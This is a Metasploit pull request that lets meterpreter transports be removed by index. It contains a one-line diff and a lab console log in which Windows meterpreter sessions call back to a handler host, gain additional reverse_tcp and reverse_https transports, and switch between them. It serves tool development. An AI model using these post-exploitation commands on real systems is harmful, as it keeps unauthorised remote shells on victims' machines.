### PR TITLE
Specify transport by index

### DIFF
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -803,7 +803,7 @@ class Console::CommandDispatcher::Core
 
       print_status("Removing transport ...")
       if client.core.transport_remove(opts)
-        print_good("Successfully removed transport ##{transport_index}.")
+        print_good("Successfully removed #{opts[:transport]} transport.")
       else
         print_error("Failed to remove transport, please check the parameters")
       end


### PR DESCRIPTION
Adds the ability to specify transport by its index (like `sessions -i X`) instead of by ip/port/proto. Currently only useful for removing transports but may be handy for future transport stuff. Everything is tracked in framework so no changes should be needed to the various meterpreters.

cc @bcook-r7 @OJ 

```
msf exploit(handler) > jobs -v

Jobs
====

  Id  Name                    Payload                              LPORT  URIPATH  Start Time
  --  ----                    -------                              -----  -------  ----------
  0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  443             2015-07-12 14:28:38 -0400
  1   Exploit: multi/handler  windows/meterpreter/reverse_tcp      5555            2015-07-12 14:28:38 -0400
  2   Exploit: multi/handler  windows/meterpreter/reverse_https    6666            2015-07-12 14:28:38 -0400

msf exploit(handler) >
[*] Sending stage (1105970 bytes) to 192.168.100.8
[*] Meterpreter session 1 opened (192.168.100.234:443 -> 192.168.100.8:56216) at 2015-07-12 14:28:49 -0400

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > transport add -t reverse_tcp -l 192.168.100.234 -p 5555
[*] Adding new transport ...
[+] Successfully added reverse_tcp transport.
meterpreter > transport add -t reverse_https -l 192.168.100.234 -p 6666
[*] Adding new transport ...
[+] Successfully added reverse_https transport.
tmeterpreter > transport list
Session Expiry  : @ 2015-07-19 14:28:48

    ID  Curr  URL                                                                                          Comms T/O  Retry Total  Retry Wait
    --  ----  ---                                                                                          ---------  -----------  ----------
    1         https://192.168.100.234:6666/PqMnud6ruvU2oDeiYwKHfguDKICVGEOu-MbQZWXVCd0MGnohWEBbK_L18tQ84/  300        3600         10
    2   *     tcp://192.168.100.234:443                                                                    300        3600         10
    3         tcp://192.168.100.234:5555                                                                   300        3600         10

meterpreter > transport next
[*] Changing to next transport ...

[*] Sending stage (885806 bytes) to 192.168.100.8
[+] Successfully changed to the next transport, killing current session.

[*] 172.16.0.138 - Meterpreter session 1 closed.  Reason: User exit
[*] Meterpreter session 2 opened (192.168.100.234:5555 -> 192.168.100.8:56217) at 2015-07-12 14:29:43 -0400

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > transport list
Session Expiry  : @ 2015-07-19 14:28:47

    ID  Curr  URL                                                                                          Comms T/O  Retry Total  Retry Wait
    --  ----  ---                                                                                          ---------  -----------  ----------
    1         https://192.168.100.234:6666/PqMnud6ruvU2oDeiYwKHfguDKICVGEOu-MbQZWXVCd0MGnohWEBbK_L18tQ84/  300        3600         10
    2         tcp://192.168.100.234:443                                                                    300        3600         10
    3   *     tcp://192.168.100.234:5555                                                                   300        3600         10

meterpreter > transport remove -i 2
[*] Removing transport ...
[+] Successfully removed reverse_tcp transport.
meterpreter > transport list
Session Expiry  : @ 2015-07-19 14:28:47

    ID  Curr  URL                                                                                          Comms T/O  Retry Total  Retry Wait
    --  ----  ---                                                                                          ---------  -----------  ----------
    1         https://192.168.100.234:6666/PqMnud6ruvU2oDeiYwKHfguDKICVGEOu-MbQZWXVCd0MGnohWEBbK_L18tQ84/  300        3600         10
    2   *     tcp://192.168.100.234:5555                                                                   300        3600         10

meterpreter > transport next
[*] Changing to next transport ...
[+] Successfully changed to the next transport, killing current session.

[*] 172.16.0.138 - Meterpreter session 2 closed.  Reason: User exit

[*] 192.168.100.8:56218 (UUID: 3ea327b9deabbaf5/x86_64=2/windows=1/2015-07-12T18:28:46Z) Attaching orphaned/stageless session ...
[*] Meterpreter session 3 opened (192.168.100.234:6666 -> 192.168.100.8:56218) at 2015-07-12 14:30:55 -0400

msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > transport remove -i 2
[*] Removing transport ...
[+] Successfully removed reverse_tcp transport.
meterpreter > transport list
Session Expiry  : @ 2015-07-19 14:28:47

    ID  Curr  URL                                                                                          Comms T/O  Retry Total  Retry Wait
    --  ----  ---                                                                                          ---------  -----------  ----------
    1   *     https://192.168.100.234:6666/PqMnud6ruvU2oDeiYwKHfguDKICVGEOu-MbQZWXVCd0MGnohWEBbK_L18tQ84/  300        3600         10

meterpreter >
```
